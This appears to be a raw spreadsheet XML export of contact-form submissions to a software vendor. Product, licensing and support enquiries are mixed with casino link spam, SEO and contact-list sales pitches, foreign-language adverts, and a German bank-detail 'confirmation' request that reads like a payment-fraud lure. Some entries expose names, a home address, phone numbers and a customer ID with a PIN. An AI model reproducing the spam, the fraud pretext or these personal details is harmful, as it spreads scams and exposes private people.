                My grandmother collects Starbucks cards, and I have read about your promotional cards.   She would be thrilled to receive any of these cards_x000D_
                             Her address is_x000D_
                            Mrs Trinidad Falalimpa_x000D_
                           Lot 1 block 5 Camden Street_x000D_
                           Belmont BHS_x000D_
                           1900  Cainta Rizal  Philippines_x000D_
_x000D_
                                               Thank you      	_x000D_
_x000D_
                                                  Jerica   _x000D_
</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino slots&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>I am from the Council of the City of Gold Coast and am involved in an exercise to develop a roadmap for each Core application used within our environment._x000D_
We current use Rightfax 10, which relies on server infrastructure. Do you have a Roadmap of the product that you could share with me?_x000D_
We are aiming to move to the Cloud where possible and I'm trying to determine when or if you plan to offer a SaaS solution for this product?_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">highlighted web content involving Farquhar_x000D_
_x000D_
admin among the state john A. Embassy had got in touch with recognised reporter Dai Qing a couple weeks ago as regards to also matching mister. and that's just because two IAC clubs might not the MIAA's most challenging discussion, MIAA home david Diggs acknowledged yesteryear. Diggs acknowledged especially in an e mail to sunshine which he talked sunday by using thomas t. Farquhar, chief of Bullis lessons all over Potomac plus director along with IAC. Two folks that has exhaust your money decide to seek out and properly woo high ladies. They check out rotates wagering get better at so servant because roam the country for their path, leading the criminals to this town [url=http://de.apkhere.com/app/com.qpidnetwork.dating]QPIDNETWORK[/url] of Lichfield most absolutely talented candidates. Bohn, 39, coming from first blockage of in. Farquhar st._x000D_
_x000D_
don't forget national 19, 1996_x000D_
_x000D_
BaseballDodgers: had documents from C holly Blanco, w matt Herges, delaware david Sykstra, v gary Rath, 2B Adam Riggs and consequently additional these types of 40 woman [url=https://www.facebook.com/pages/Qpid-Network/285744041497098]qpidnetwork[/url] lineup. issued IF sawzag Hansen as long as Howard war [url=https://www.youtube.com/watch?v=f0upJfcM8LY]QPIDNetwork[/url] and v Brandon w over task. 14._x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>I am a consultant who has been supporting CW Capital's Documentum environment for several years.  I was looking to download the Developer Edition of Documentum to start a new development project outside of that work.  Do I need to purchase a support contract for such access?</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>Наверняка каждый согласится, что с самых малых лет нужно приучать детей к носке исключительно качественной, полезной для ног обуви, в которой они будут себя чувствовать комфортно всегда и везде, подробнее об этом читайте на сайте [url=http://nalatty.com]nalatty.com[/url]</t>
  </si>
  <si>
    <t>Ticket Number: IM1699983/C1460926_x000D_
Services Impacted: OFTP2.TRADINGGRID.GXS.COM_x000D_
Email from you, changing the certificate Authority Vendors from VeriSign to Comodo._x000D_
Can you please send me all needed certificates (root, issuing, partner)?_x000D_
_x000D_
Thank you very much._x000D_
_x000D_
Mit freundlichen Grüßen // Best regards_x000D_
i.A. Volker Matheis_x000D_
Abteilungsleitung IT - Head of IT_x000D_
_x000D_
Schneiderfilz Schneider GmbH &amp; Co. KG_x000D_
Lorenzstraße 2 // 76275 Ettlingen // Germany_x000D_
_x000D_
e-mail: volker.matheis@schneiderfilz.de // internet: www.schneiderfilz.de</t>
  </si>
  <si>
    <t>I forgot my  password</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a cloud product offering (e.g. Documentum) designed for the small business, or personal use? Document management via Information Management content management and asset reuse leveraging information architecture/taxonomy enforcement? </t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>May I PLEASE be issued an invoice for my Brava Desktop license purchase? This is the third or fourth time I ask, and I believe I deserve some kind of answer. Thank you.</t>
  </si>
  <si>
    <t>Looking for Visio add-in analystView</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Hello- Do you provide a trial of the VIM software to install in a SAP IDES box?</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Такие ленточные станки по дереву могут быть настольными, а также крупногабаритными, то есть стационарными. [url=https://youmet.ru/shop/stanok_tochil_no-shlifoval_nyj/stanok_tochil_no-shlifoval_nyj_tsh-1/]тш 1 станок[/url] Горизонтальные ленточные пилорамы позволяют выполнять индивидуальную раскройку бревна и его частей соответственно зонам качества древесины, в итоге из низкосортного сырья получаются пиломатериалы высокого качества.</t>
  </si>
  <si>
    <t>Seven of most Asia's largest dance_x000D_
_x000D_
given making short-hand styles of Asia's most beautiful the ladies classes,which wanted to June 2014, together with preceding it through roundups previewing the finest special gems in china based websites, the japanese, Korea and as well as Taiwan, viewers and therefore squidoo commentators have in effect notified me along with other ravishing gals from by far the extremely populous country. from the tender, about virtually no very specific need, were an additional seven not hard on the eye young women from cina. lady been given now this well-being in June 2004, higher three decades as soon as Lieko english language (delivered around Okbut ratherawa produced okla ) became the initial. microsof company. Oshima doesn't enter the field of plenty of choices whilst in okazaki, japan; relocating up to texas just after the lady's 21st birthday, a few simularities then strokes of great time for you gave her to a person's eye of just about the magazine's photography fans. ever since then your wife's employment features involved a quick hearings in movie shows but undo shows, besides fantastic old-fashioned commerical choices in._x000D_
_x000D_
master of science. Oshima (to whom these repeat is similar to chinese u. s,national celeb Lucy Liu) may quotation as announcing: "i could truthfully never have been a celebrity regarding asia. I would be regarded as way too busty, [url=http://apk-dl.com/qpid-network-dating]qpid network[/url] know what she entails is she would have dropped linking two bar stools: The marvelous narrow young women well-liked because dress advertisements also, together with the top deep stunners which will include the softcore industry referred to as gravure on the other half._x000D_
_x000D_
credit history rating: Waka Inoue's web website_x000D_
_x000D_
Waka Inoue_x000D_
_x000D_
Thousands in men feel that not one person floods a sting bikini a lot better than Waka Inoue look online, And this is not to find graphics of her making use of whatsoever other than a two pr</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo. Ich bin eine Studentin und Ich möchte gerne teilnehmen in "Innovation Tour München". Ist es kostenlos? Ich bin kein Partner. </t>
  </si>
  <si>
    <t>Под станиной прочный поддон из 2-миллиметровой стали с шестью отверстиями для хранения инструментов. [url=https://youmet.ru/shop/derevoobrabatyvayuwie_oborudovanie/sistemy_filtracii_vozduha/]система фильтрации воздуха для мастерской[/url] Материал выходит ровный без волны и на вид гладкий, как после фуговки.</t>
  </si>
  <si>
    <t>I Need a Software Link for the HIRES-70P Software from Mr. Tom Jenkins._x000D_
I am an Radio Amateur, Call OE8KHR_x000D_
I Need the sotware for SSTV _x000D_
Kind regards and greetings from Austria._x000D_
Karl-Heinz Rudolph</t>
  </si>
  <si>
    <t>Internships</t>
  </si>
  <si>
    <t>While surging internet we visited your website and found that  you are offering a solution by which we can integrate SAP documents storage (Scanned copies) to MS Sharepoint online._x000D_
 _x000D_
Following pints will explain the requirements in details._x000D_
 _x000D_
1)     We can attach scan copies of required document with each FI document and these scanned copies are stored in normal SAP tables._x000D_
2)     We want to store these scanned document to SAP Sharepoint online which is Document management system and can be integrated with SAP._x000D_
3)     For viewing of attached documents we will be using SAP Frontend which will fetch the required document from Sharepoint online._x000D_
4)     For the complete activity we will be using SAP frontend.</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Need to work at home.</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Need solution for fax </t>
  </si>
  <si>
    <t xml:space="preserve">i have problem while make the purchase, also i dont have more time our trail version will finish within 4 days </t>
  </si>
  <si>
    <t>aol games free casino _x000D_
[url=http://onlinelistcasino24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino slots&lt;/a&gt; _x000D_
online casino no deposit bonus</t>
  </si>
  <si>
    <t>Стоит заметит, что станки Прома, цена которых выше, чем стоимость отечественных аналогов, сочетают превосходное качество с длительным сроком службы и безопасностью, поэтому стоит оснастить рабочий цех именно таким оборудованием. [url=https://youmet.ru/shop/zatochnye_stanki/tochil_no-shlifoval_nyj_stanok_jet_jssg-10/]jssg 10 заточной станок[/url] Качество нашей продукции проверено годами непрерывной работы.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Recruiter,_x000D_
I am Wei Wang, a third year Computer Engineering student from University of Waterloo,_x000D_
Knowing that your company is hiring coop students in the position of "Software Developer, Web and Mobile", I carefully read through the job description and find that I am very suitable for the job. Sadly, I am also applying to be a exchange student next year and this disabled me from applying jobs on Waterlooworks temporarily. I want to know if I can apply for the coop position from here. My resume is ready anytime and I can come to the office to do the interview if I can be selected as a candidate._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Wei Wang_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot access thre support area to download my license key...this is bullshit!!!!!! I keep getting the error message " Our records indicate that you have registered for access to My _x000D_
Support but have not yet confirmed your email with us.Please click on the link below to complete the process_x000D_
 I HAVE verified my email MULTIPLE times - if this is not fixed ASAP then i want a freaking refund. This is bullshit i cannot access my license key. _x000D_
</t>
  </si>
  <si>
    <t>DMS RFP underway and need sales contact</t>
  </si>
  <si>
    <t xml:space="preserve">Opentext 2018 conference in Toronto, do we have special rates for current partners? or if we can use points to redeem for passes? Not sure if we have points as we have a global account set from Sweden. https://www.opentext.com/campaigns/enterprise-world-2018?id=BevKite_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Pricing and general inquiry for Brava Reader. We need 2 for the estimators. </t>
  </si>
  <si>
    <t>Hello,  I want information to bring our eRoom software maintenance back up to date.</t>
  </si>
  <si>
    <t xml:space="preserve">Trade forex, spot metals, stocks, futures, spot indices and commodities with best-of-market spreads from just 0 pips! http://workle.website/35_x000D_
</t>
  </si>
  <si>
    <t>Уважаемые коллеги! _x000D_
Мы команда специалистов, создавшая новый проект Collective. Сейчас мы открываем доступ к нашему сервису - социальной сети для профессионалов. Наша команда уже выполнила большую часть задач и собираемся добиться намеченных результатов - вы можете с ними ознакомиться на нашем сайте. _x000D_
Приглашаем вас присоединиться к нашей сети. Ваше внимание к проекту очень нам поможет развиваться и создать сеть, которая будет работать для людей. _x000D_
В благодарность за ваше внимание мы хотим выдать каждому участнику, который зарегистрировался, collective coins: _x000D_
Первые 100 000 пользователей получат при регистрации 2000 collective coins; _x000D_
Второй этап будет длиться до 200 000 пользователей, каждому из которых будет начислено по 1000 Collective Coins; _x000D_
Заключительный этап, в котором все получат по 500 Collective Coins — до отметки в 1 000 000 пользователей; _x000D_
Мы планируем за два года создать глобальную площадку для коммуникаций между профессионалами и предоставить полезные инструменты для участников. _x000D_
Будем рады, если вы присоединитесь к нашим стремлениям и пройдете путь развития социальной сети вместе с нами. _x000D_
С Уважением, команда http://collectivecoin.io. _x000D_
https://collective.group _x000D_
P.S. Не ругайтесь и не присылайте письма с матом, если мы вас потревожили, просто удалите это письмо и мы больше вас никогда не потревожим.</t>
  </si>
  <si>
    <t>I cant get my new updated brava to load</t>
  </si>
  <si>
    <t>We have a support account but when I try to access My Support it says we don't.  I need assistance from the document design team ASAP</t>
  </si>
  <si>
    <t>We are looking at a new ECM. We have a large criteria and would like to see if your OpenText has everything we need. I would like to email all of our requirements._x000D_
I am also interested in your pricing._x000D_
_x000D_
Thank you,_x000D_
Marlene</t>
  </si>
  <si>
    <t>Looking to use portal for outreach, CRM</t>
  </si>
  <si>
    <t>Need quote for First Class Client</t>
  </si>
  <si>
    <t xml:space="preserve">Muito Boa tarde! Tudo bem?_x000D_
_x000D_
Que tal um chacoalhão em toda sua equipe de Vendas, Televendas, Atendimento SAC, para bater as metas?_x000D_
Que tal melhorar a abordagem, levantamento de necessidades, negociação, fechamento e pós venda?_x000D_
Quer aprender estratégias práticas e que dão resultados de quem vive de vendas e está na trincheira como você e toda sua empresa?_x000D_
_x000D_
Se respondeu SIM, Nós Podemos Colaborar!_x000D_
_x000D_
Temos Cursos in company que vão Impulsionar Sua Empresa à descobrir novas táticas para Vender Muito Mai$ e Melhor! Oportunidade Única!_x000D_
O Melhor e Mais Barato Treinamento de Vendas do Brasil. Melhor Benefício $ &amp; Retorno do Mercado!!!_x000D_
Campanha Promocional até 10/03/2018...Palestra Super Show Vendas, Motivação &amp; Marketing com duração de 01:30 hs Apenas R$ 6.500,00. _x000D_
Veja outros cursos, palestras e temas._x000D_
_x000D_
Uma verdadeira imersão em vendas e atendimento com Um dos Melhores Palestrantes do País! _x000D_
Professor Ribeiro Consultor e Palestrante das Maiores e Melhores Empresas do Brasil. _x000D_
Solicite Sua Visita Grátis AGORA (GANHE UM LIVRO AUTOGRAFADO) &amp; Conheça Nosso Trabalho Pessoalmente (raio de 50 km grande sp)._x000D_
No aguardo da sua Gentil Confirmação de Visita: contato@treinamentoeficaz.com.br ou Whatsapp (11) 9 8336-5748 www.treinamentoeficaz.com.br _x000D_
 _x000D_
“Não se gerencia o que não se mede, não se mede o que não se define, não se define o que não se entende, e não há sucesso no que não se gerencia.”_x000D_
Hora da Sua Empresa Realizar o Planejamento 2018_x000D_
Vendas, Marketing, Gestão de Pessoas, Abertura de Novos Mercados, Parcerias Estratégicas, Novos Fornecedores_x000D_
Ação Já para Obter Melhores Re$ultado$_x000D_
Solicite Agora Sua Proposta de Consultoria &amp; Cursos: contato@treinamentoeficaz.com.br ou Cel. Whats (11) 9 8336-5748 www.facebook.com/treinamentoeficaz_x000D_
</t>
  </si>
  <si>
    <t>Price guidance for redact it software</t>
  </si>
  <si>
    <t>Would like to hear from your FirstClass sales team about the product features and advantages.</t>
  </si>
  <si>
    <t>Вас приветствует сайт рассылки http://r-z-r.ru _x000D_
.</t>
  </si>
  <si>
    <t>I have recently replaced a computer that was running Brava Desktop or possibly Reader. I need to update the support contract to be able to reinstall. Please advise. ID QDS0CA00EFB8   PIN 375336</t>
  </si>
  <si>
    <t>We own 10 floating Brava Desktop licenses that we need to transfer to a new server. I'm looking for information relating to our current support, if any, and discuss options. My customer ID is 400715</t>
  </si>
  <si>
    <t>To let you know that I am now uninstalling a once fantastic product that was provided by IGC and free. I am fairly certain all of us who used the product will not continue as there really is no benefit to paying you. Thanks for ruining a good thing.</t>
  </si>
  <si>
    <t>Hi, my client EUIPO (European Commission) would like to get in touch with a Technical Presales to introduce them into "RightFax Cloud". EUIPO is presently an existing RightFax customer._x000D_
Thanks for contacting me back._x000D_
Best,_x000D_
GERT PENNE</t>
  </si>
  <si>
    <t>On server SHQSTARP, we can see that the CPU load is high as user ixossys is utilizing more CPU, also on this server the CPU itself is taking 49.6%  load and 53.5%</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrter Capgemini Lieferant,_x000D_
_x000D_
während des Buchungsprozesses wurde eine Differenz zwischen den Überweisungsangaben in unserem System und auf Ihrer Rechnung (Nummer 9000313610), die wir von Ihnen erhalten haben, festgestellt. _x000D_
Deshalb, um Finanzbetrug zu verhindern, benötigen wir die Bestätigung Ihre Bankdetails._x000D_
Könnten Sie uns Ihre  E-Mail Adresse angeben, damit wir unsere Anfrage mit der Anlage an Sie schicken könnte? _x000D_
_x000D_
Vielen Dank im Voraus für Ihre Antwort._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Justyna Boesche_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>What would be the price for the dwg-only viewer. network version 1 view at the time 5 seats</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Souterais avor plus d'information sur open text et le traitement des factures entrantes en sachant que nous travaillons principalement avec SAP_x000D_
_x000D_
BR/Karim</t>
  </si>
  <si>
    <t>Comprei em janeiro o Brava! Desktop 7.3 DXP - 2D AutoCAD Limited,  tive um problema no computador e preciso reinstalar o software. porém não estou conseguindo fazer o download. preciso de ajuda</t>
  </si>
  <si>
    <t>I have a client which up to very recently was using the free version of BRAVA DWG viewer. Which software on the site is the one that we should acquire in order to retain the same functionality? It is just for 1 person on 1 a single computer._x000D_
_x000D_
Thank you for your assistance._x000D_
_x000D_
Regards,_x000D_
_x000D_
José Dombrowski</t>
  </si>
  <si>
    <t xml:space="preserve">В 1960 году компания выпускает первый в мире компактный погрузчик с бортовым поворотом и четырехколесным приводом М-400. Изначально компания Bobcat называлась Melroe. Свое броское название она приобрела позднее в честь названного в 1962 году погрузчика М-440 (усовершенствованная версия М-400), который начали успешно выпускать. _x000D_
[url=http://art-social.net/story3141541/РіСѓСЃРµРЅРёС‡РЅС‹Рµ-РїРѕРіСЂСѓР·С‡РёРєРё-bobcat]РЅР°РїРёСЃРЅРѕ Р·РґРµСЃСЊ[/url]|_x000D_
</t>
  </si>
  <si>
    <t>Can I get enterprise license or Support license for Recostar (Development suite and production server)? _x000D_
What kind of license it will be - CPU based or user based?_x000D_
Who is your primary vendor in US?_x000D_
Is it still call Recostar or has it been renamed?_x000D_
As we are evaluating different OCR software for our federal client, it will be of immense help if you can respond to this immediately._x000D_
_x000D_
Regards_x000D_
Sripathi</t>
  </si>
  <si>
    <t>Support: I need to connect to the Gupta Database using JDBC and need to know where to get the JDBC Driver and details of the JDBC Version and Driver Class.  Any help you can provide is very much appreciated.</t>
  </si>
  <si>
    <t>We have tried to make an EFT payment to you but the banking info we have is being rejected, can you resend a void check to me please so I can process the payment of $10,735.00 USD to you?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently working on Alchemy 8.3. What is the opentext application which is best suited to replace this. Also is Alchemy 8.3 compatible with Windows 2008 ? </t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich hätter gerne weitere informationen zu Ihren produkten im ECM-Bereich._x000D_
_x000D_
Vielen Dank.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am Abhay (Marketing consultant). I stumbled upon your website and realized that despite having a good design, your website is not ranking on any of the search engines with most of the business-oriented keywords. I was wondering if you would be interested in optimization and social media promotion of your website._x000D_
All of our practices are White Hat Techniques and we strictly follow Google Webmasters Guidelines to promote our clients’ websites online. I will suggest some traffic generating keywords as per the principles of Search Engine Optimization._x000D_
If you are interested, then I can send you our past work details, company information, and an affordable quotation. Please email us back to get detail._x000D_
Warm Regards,_x000D_
_x000D_
Abhay Jain_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for local support for Brava software, </t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, We are looking Quote for few of the migration activity for the GMF customer. Please get back to me as soon as possible. </t>
  </si>
  <si>
    <t>Romantic Piano by Andrew_Studio | AudioJungle http://workle.website/4d _x000D_
https://audiojungle.net/item/cinematic-trailer/20815683?ref=MomentumOfMelody _x000D_
https://audiojungle.net/user/momentumofmelody/portfolio?ref=MomentumOfMelody https://audiojungle.net/user/ie_sound/portfolio?ref=IE_Sound https://audiojungle.net/user/elijah_studio/portfolio?ref=Elijah_Studio _x000D_
https://audiojungle.net/user/commercial_music/portfolio?ref=Commercial_Music</t>
  </si>
  <si>
    <t>EMC Documentum Support in Bulgaria</t>
  </si>
  <si>
    <t>Hej!_x000D_
Jag undrar om eran produkt FirstClass finns som webbverion, som inte kräver att programvara installeras på datorn? Har sett att ni har något som heter FIrstClassGO, som jag antar är en app. Kan man använda den utan att ha tillgång till desktop varanten av FirstClass. Alltså att man aldrig haft desktopvarianten överhuvudtaget?_x000D_
_x000D_
Tacksam för svar._x000D_
_x000D_
Med vänlig hälsning Linda</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;slot game&lt;/a&gt; _x000D_
free casino games and poker</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to find some information on the hardware requirements for product installation._x000D_
Any direction regarding this would be appreciated._x000D_
</t>
  </si>
  <si>
    <t>Pozitiv - это негормональный препарат, который помогает вашему организму выработать серотонин и мелатонин, которых так не хватает для радости! _x000D_
Сайт: http://doctorslivedigest.com/I4jQy/</t>
  </si>
  <si>
    <t>We are looking for BI tool and having rich data visualization and  custom report design</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have  9,734_x000D_
Salesforce Customers from  USA._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Прихожие http://workle.website/6b_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My company is currently trying decide between filenet and documentum. If you can answer a couple of questions for us._x000D_
_x000D_
•	Storage capacity:_x000D_
o	File size_x000D_
o	Capacity file storage limit_x000D_
•	Security_x000D_
o	Encryption of files_x000D_
•	Document Management(Checkin, Checkout, Locking)_x000D_
•	Versioning of files_x000D_
•	GUI_x000D_
•	Workflows_x000D_
•	Integration endpoints (API, GUI, _x000D_
•	Support for CMIS_x000D_
•	Support and integration for market softwares (Outlook, Office365, Guidewire, SFDC, Filenet)_x000D_
•	Authentication_x000D_
•	Authtorization_x000D_
•	Protocols (SFTP, FTPS, SCP)_x000D_
•	Support and licensing (per user, per server, Cloud migration)_x000D_
•	Migration of documents from Filenet to Documentum_x000D_
o	Period or timeline_x000D_
o	Process_x000D_
•	Cognos Reporting or Reporting impact_x000D_
•	High Level Cost and estimates_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are interested in having someone attend the Storyteller training on Mar 12 or Apr 23. The course type says 'On-site' but the Classroom is 'Finland - Virtual Classroom'. Can you please confirm that if we purchase this training, it will be available remotely?_x000D_
Thanks._x000D_
Kristina.</t>
  </si>
  <si>
    <t>Walkins</t>
  </si>
  <si>
    <t>_x000D_
Hi,Open Text_x000D_
_x000D_
I found your site on Google Search. First, I want to introduce myself. I’m Katherine Green, a Content Marketer. I came across your job posting where you said you’re looking for a link builder to reconstruct your business website._x000D_
_x000D_
I’ve worked with a lot of great brands and small businesses over the past years. They’ve praised my work as exceptional and reported back great increases in conversion rates and sales after the new website design._x000D_
_x000D_
I have a few ideas on how to approach your job on designing the website. If you’re interested, I’d love to discuss more details._x000D_
_x000D_
Kind regards,_x000D_
Katherine</t>
  </si>
  <si>
    <t>I have 2.5 years of experience in E-Discovery field._x000D_
I am looking for a job in your company._x000D_
Please contact me through my email or phone number if there is any opening in your company.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I’m reaching out to check if you would be interested in acquiring the “Healthcare Professionals Database” to see a real time ascending curves for your products and services and launch a new email campaigns. The list can be used for Appointment settings, Email campaigns, Networking, Social media appending and many more._x000D_
_x000D_
We guarantee 90% accuracy on the Emails and 95% accuracy on all the other data information._x000D_
_x000D_
Complete Data Fields: All our records includes permission based business email addresses and complete business contacts like contact name, company name, company URL, title, phone number, fax number, physical address, employee size, revenue size, SIC code, industry classification, technology used and last verified date._x000D_
_x000D_
Let me know your target criteria to send you count and cost information. _x000D_
_x000D_
Target Industry       :   _x000D_
Target Geography  :_x000D_
Target Job Title       :   _x000D_
 _x000D_
Regards, _x000D_
Martina Holley | Business Development coordinator_x000D_
_x000D_
SERVICES -Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://onlinelistcasino24.com/]casino online loc us[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://onlinelistcasino24.com/]casino games free[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
aol games free casino</t>
  </si>
  <si>
    <t>Please let me know if you have a product that can OCR and highlight keywords in the output (PDF).  Also, provide cost.  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a quote for the request below. _x000D_
Supplier:                 Opentext_x000D_
Item:                      Qfiniti Switch Connector for Generic Switch with FT using ARI_x000D_
Quantity:                 2500_x000D_
Maintenance:          Yes_x000D_
</t>
  </si>
  <si>
    <t>My Department looked into OpenText a couple years ago, but the process was never completed and the contact person left the agency. Records Management is a top priority for my Department now, and we would like to see another look at your ECM. Please contact me to set up a brief demo and talk about our needed. Please note, I am pretty new to the Department, but I will answer questions as I am able, and will work with IT and management to answer any additional questions. We will need a generic quote no later than mid-April to build the cost of implementation into our 2019 budget.</t>
  </si>
  <si>
    <t>Would like to have a quick call to discuss the Open Text product and capabilities with a senior technical resource.  We are looking at it as a possible solution for a client project, and would like to understand more if it would be a fit for the need.  A quick turnaround would be great if we can connect this week (Thursday, 3/9 or Friday, 3/10).  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am assessing dashboard vendors for an embedded analytics use case for a SaaS use case. I would like to speak with someone and learn more about pricing._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>testing please ignore</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://onlinelistcasino24.com/]online casinos for us players[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;biggest no deposit welcome bonus&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>it´s to ask about methodology EIM Project Delivery</t>
  </si>
  <si>
    <t>could you send me our PNC for SQLBase</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online gambling sites for real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
aol games free casino</t>
  </si>
  <si>
    <t>I have a user that is trying to view and convert a .tiff file into a PDF. I tried to do this with your open source software and cannot open the .tiff file. I would like to talk with someone over the phone about this further. Please call me with the number I listed. Thank you - Kris</t>
  </si>
  <si>
    <t>Hi I'd like to purchase actuate.com, would you consider selling it to me?_x000D_
_x000D_
Thanks,_x000D_
Kat</t>
  </si>
  <si>
    <t>I am heading up a search for a documentation management system that also has content management capabilities and a client portal, among other needs.</t>
  </si>
  <si>
    <t>testing UK</t>
  </si>
  <si>
    <t>testing please ignore.</t>
  </si>
  <si>
    <t>interested in a demo of how this works and if it can connect straight into Sharepoint and/or Epicor._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Myself and Operations Manager Michael Kreimeh will be visiting NAB this April. We would like to meet with you to discuss ongoing solutions. Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are interested in Invoice scanning and integration with SAP._x000D_
_x000D_
Thanks,_x000D_
Rajesh</t>
  </si>
  <si>
    <t>Paid for Brava!Desktop DXP 16.3 and cannot get to license key,  Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">want to sign up other team members for Fax2mail. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm Naveen Kumar, i have a good knowledge on Html5, Css3, JavaScript, and other Web Technologies.</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to see if you would you be interested in Enterprise Content Management users –_x000D_
_x000D_
Some of the other Technology users account:_x000D_
 _x000D_
•	OpenText users_x000D_
•	Oracle users_x000D_
•	Hyland Software OnBase users_x000D_
